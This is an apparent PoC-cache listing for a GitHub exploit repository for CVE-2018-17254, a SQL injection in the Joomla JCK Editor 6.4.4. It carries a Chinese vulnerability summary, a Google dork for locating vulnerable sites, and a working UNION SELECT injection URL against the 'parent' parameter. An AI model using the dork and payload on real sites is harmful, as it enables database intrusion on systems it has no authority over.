CVE-2018-17254 PoC — Joomla! JCK Editor组件SQL注入漏洞

Source

https://github.com/MataKucing-OFC/CVE-2018-17254

Associated Vulnerability

Title:Joomla! JCK Editor组件SQL注入漏洞 (CVE-2018-17254)
Description:Joomla!是美国Open Source Matters团队开发的一套开源的内容管理系统(CMS)，该系统提供RSS馈送、网站搜索等功能。JCK Editor是其中的一个编辑器组件。 Joomla! JCK Editor组件6.4.4版本中存在SQL注入漏洞。远程攻击者可通过向jtreelink/dialogs/links.php页面发送‘parent’参数利用该漏洞执行SQL命令。

Description

Joomla JCK Editor 6.4.4 - 'parent' SQL Injection

Readme

# CVE-2018-17254


![](https://media.tenor.com/xjIYN3WkB4wAAAAC/smile-person-akirambow.gif)

<pre>
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection>
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10 Ubuntu Windows 11/10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

Preference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254</pre>
Greettzz LXPLOIT - CUKIMAY CYBER TEAM
My Friends : Noniod7 - Ardzz
Recoded from : Hamza Megahed
https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html

File Snapshot


 [4.0K]  /data/pocs/e13bd93d822af7d188178cc7ec8f902f96bebe0d
├── [ 12K]  CVE-2018-17254.php
└── [ 846]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!